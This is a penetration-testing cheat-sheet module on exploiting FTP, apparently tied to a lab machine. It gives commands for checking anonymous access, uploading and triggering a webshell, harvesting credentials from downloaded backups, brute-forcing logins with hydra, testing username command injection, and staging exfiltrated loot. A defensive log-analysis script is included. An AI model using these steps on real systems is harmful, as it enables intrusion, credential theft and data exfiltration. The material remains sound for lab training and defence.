FTP Exploitation

#Overview

FTP (File Transfer Protocol) on port 21 often runs with anonymous authentication enabled or default credentials. Write-enabled FTP directories that overlap with web roots provide a direct path to webshell deployment. FTP servers may also host backup files, database exports, and credential artifacts that enable lateral movement or privilege escalation.

#Prerequisites

  • ftp client (built into most operating systems) or lftp for recursive operations
  • nmap for version detection and anonymous login check
  • Hydra or medusa for credential brute-forcing

#Detection & Enumeration

Scan for FTP services and check anonymous access:

```bash
nmap -p 21 --script ftp-anon,ftp-bounce,ftp-syst <IP>  # Check anonymous FTP and version
ftp <IP> 21                                             # Connect manually
# At prompt: user anonymous, password anything
```

Enumerate contents with lftp for recursive listing:

```bash
lftp -e "ls -R; quit" ftp://anonymous@<IP>
```

#Exploitation / Execution

#Anonymous FTP -- Upload Webshell to Web Root

```bash
ftp <IP>
# user: anonymous, pass: anything
ftp> cd /var/www/html                  # Navigate to web root (common: /var/www/html, /htdocs, /inetpub/wwwroot)
ftp> put shell.php                     # Upload PHP/ASPX webshell
ftp> bye
curl "http://<IP>/shell.php?cmd=id"    # Trigger webshell (URL quoted so the shell does not glob on "?")
```

#Anonymous FTP -- Binary File Analysis

Files found on FTP shares (.mdb, .zip, .pst, .bak, .sql) often contain credentials:

```bash
ftp <IP>
ftp> get backup.zip                    # Download interesting files
ftp> get database.mdb
ftp> get archive.pst
```

Analyze offline:

```bash
file backup.zip && unzip backup.zip           # Inspect ZIP contents
mdb-tables database.mdb                       # List MS Access tables
mdb-export database.mdb <table>               # Dump table contents
readpst archive.pst                           # Extract PST email archive
```

#Default FTP Credentials

```bash
# ProFTPD: admin/admin, proftpd/proftpd
# vsftpd: ftp/ftp, anonymous/anonymous
# FileZilla: default admin config in FileZilla Server.xml
hydra -L users.txt -P passwords.txt ftp://<IP>  # Brute force
```

#FTP Command Injection

Some FTP servers are vulnerable to command injection via username or filename parameters. Test by injecting command separators:

```bash
ftp <IP>
Name: test; id;
```

#File Exfiltration via FTP

If you can write to FTP, use it to stage data:

```bash
ftp <IP>
ftp> mkdir exfil
ftp> cd exfil
ftp> put loot.tar.gz       # Upload compromised data back to attacker-controlled FTP
```

#Common Pitfalls

  • Passive vs. active FTP mode issues through firewalls -- use the passive command in the ftp client, or lftp with set ftp:passive-mode on
  • Binary vs. ASCII transfer mode corrupting files -- always use binary mode for executables and archives

#OPSEC Considerations

  • FTP is cleartext; credentials are visible if traffic is captured
  • FTP brute-force attempts generate login failure logs (Event ID varies by OS)
  • Web shell uploads are easily detected by file integrity monitoring if placed in web root
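
The traces listed above can be turned into a log check. The following is an added example, not part of the original module: it assumes vsftpd's native log layout, uses constructed sample lines, and flags login-failure bursts, script uploads into the web roots named earlier, and anonymous downloads of the file types named earlier. The threshold and the script-extension list are assumptions.

```python
import re
from collections import Counter

# Constructed sample lines modelled on vsftpd's native log format (assumed layout).
SAMPLE_LOG = """\
Mon Jan  6 10:15:03 2025 [pid 1] [ftp] OK LOGIN: Client "192.0.2.10", anon password "x"
Mon Jan  6 10:15:09 2025 [pid 3] [ftp] OK DOWNLOAD: Client "192.0.2.10", "/pub/backup.zip", 48211 bytes, 310.02Kbyte/sec
Mon Jan  6 10:15:20 2025 [pid 3] [ftp] OK UPLOAD: Client "192.0.2.10", "/var/www/html/shell.php", 312 bytes, 1.20Kbyte/sec
Mon Jan  6 10:15:31 2025 [pid 3] [ftp] OK UPLOAD: Client "192.0.2.10", "/pub/incoming/notes.txt", 90 bytes, 0.40Kbyte/sec
Mon Jan  6 10:20:01 2025 [pid 7] [admin] FAIL LOGIN: Client "198.51.100.7"
Mon Jan  6 10:20:02 2025 [pid 8] [admin] FAIL LOGIN: Client "198.51.100.7"
Mon Jan  6 10:20:03 2025 [pid 9] [proftpd] FAIL LOGIN: Client "198.51.100.7"
Mon Jan  6 10:21:00 2025 [pid 4] [alice] FAIL LOGIN: Client "203.0.113.4"
"""

LINE = re.compile(r'\[pid \d+\] \[(?P<user>[^\]]*)\] (?P<status>OK|FAIL) '
                  r'(?P<action>[A-Z]+): Client "(?P<client>[^"]+)"(?:, "(?P<path>[^"]*)")?')
WEB_ROOTS = ("/var/www/html", "/htdocs", "/inetpub/wwwroot")   # web roots named on this page
SCRIPT_EXT = (".php", ".aspx", ".asp", ".jsp")                 # assumed list of script types
SENSITIVE_EXT = (".mdb", ".zip", ".pst", ".bak", ".sql")       # file types named on this page
ANON_USERS = {"ftp", "anonymous"}
FAIL_THRESHOLD = 3   # assumed threshold; tune to the environment


def analyze(log_text):
    """Return a sorted list of (rule, client, detail) findings."""
    findings, failures = [], Counter()
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m:
            continue  # not a vsftpd-style event line
        user, client = m["user"], m["client"]
        path = (m["path"] or "").lower()  # logged path; assumes no chroot remapping
        if m["status"] == "FAIL" and m["action"] == "LOGIN":
            failures[client] += 1
        elif m["status"] == "OK" and m["action"] == "UPLOAD":
            if path.startswith(WEB_ROOTS) and path.endswith(SCRIPT_EXT):
                findings.append(("script-upload-to-web-root", client, m["path"]))
        elif m["status"] == "OK" and m["action"] == "DOWNLOAD":
            if user in ANON_USERS and path.endswith(SENSITIVE_EXT):
                findings.append(("anonymous-sensitive-download", client, m["path"]))
    findings += [("login-failure-burst", c, str(n))
                 for c, n in failures.items() if n >= FAIL_THRESHOLD]
    return sorted(findings)


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding, sep="\t")
```

If the FTP daemon is chrooted, the logged paths are relative to the chroot, so WEB_ROOTS has to be adjusted to match what the log actually records.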

#Post-Exploitation Value

  • Stolen archives and database dumps yield credentials for other services
  • FTP write access combined with webserver enables persistent code execution
  • FTP access to user directories may expose SSH keys (.ssh/), config files, and private documents

#Cross-References

#Tool References

| Tool | Link |
|---|---|
| lftp | https://lftp.yar.ru/ |
| hydra | https://github.com/vanhauser-thc/thc-hydra |
| readpst | https://www.five-ten-sg.com/libpst/ |

#Source Machines

  • Access (Easy, Windows) - FTP anonymous access with stored credentials